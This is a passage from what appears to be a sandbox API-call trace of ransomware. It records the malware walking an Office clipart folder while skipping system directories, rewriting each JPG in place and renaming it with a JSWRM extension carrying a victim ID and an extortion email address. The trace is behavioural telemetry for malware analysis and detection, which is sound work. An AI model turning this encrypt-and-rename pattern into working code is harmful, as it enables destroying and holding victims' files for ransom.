lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0089.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0089.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0089.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0089.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0089.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341448.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341448.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0089.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.557] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7457, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341455.JPG", cAlternateFileName="")) returned 1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2=".") returned 1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2="..") returned 1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2="...") returned 1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2="windows") returned -1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2="recovery") returned -1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2="perflogs") returned -1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2="documents and settings") returned 1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2="system volume information") returned -1 [0089.557] lstrcmpiW (lpString1="J0341455.JPG", lpString2="msocache") returned -1 [0089.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0089.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341455.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341455.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341455.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0089.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0089.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341455.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341455.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341455.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0089.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341455.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.558] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29783) returned 1 [0089.558] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7450) returned 0x24d210 [0089.559] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7450, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7450, lpOverlapped=0x0) returned 1 [0089.561] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.562] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7450, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7450, lpOverlapped=0x0) returned 1 [0089.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.562] CloseHandle (hObject=0x314) returned 1 [0089.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0089.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0089.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0089.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0089.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.563] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341455.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341455.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341455.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.564] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa9e2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341475.JPG", cAlternateFileName="")) returned 1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2=".") returned 1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2="..") returned 1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2="...") returned 1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2="windows") returned -1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2="recovery") returned -1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2="perflogs") returned -1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2="documents and settings") returned 1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2="system volume information") returned -1 [0089.564] lstrcmpiW (lpString1="J0341475.JPG", lpString2="msocache") returned -1 [0089.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0089.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341475.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341475.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341475.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0089.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0089.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341475.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341475.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341475.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0089.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341475.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.565] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43490) returned 1 [0089.565] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa9e0) returned 0x24d210 [0089.566] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa9e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa9e0, lpOverlapped=0x0) returned 1 [0089.571] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.571] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa9e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa9e0, lpOverlapped=0x0) returned 1 [0089.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.572] CloseHandle (hObject=0x314) returned 1 [0089.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0089.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0089.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0089.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0089.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0089.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.572] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341475.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341475.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341475.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0089.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.573] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ee3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341499.JPG", cAlternateFileName="")) returned 1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2=".") returned 1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2="..") returned 1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2="...") returned 1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2="windows") returned -1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2="recovery") returned -1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2="perflogs") returned -1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2="documents and settings") returned 1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2="system volume information") returned -1 [0089.573] lstrcmpiW (lpString1="J0341499.JPG", lpString2="msocache") returned -1 [0089.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341499.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341499.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341499.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341499.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341499.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341499.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341499.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.574] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16099) returned 1 [0089.574] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ee0) returned 0x24d210 [0089.575] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3ee0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3ee0, lpOverlapped=0x0) returned 1 [0089.587] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.588] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3ee0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3ee0, lpOverlapped=0x0) returned 1 [0089.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.588] CloseHandle (hObject=0x314) returned 1 [0089.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0089.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0089.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0089.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0089.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.588] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341499.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341499.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341499.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.589] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: 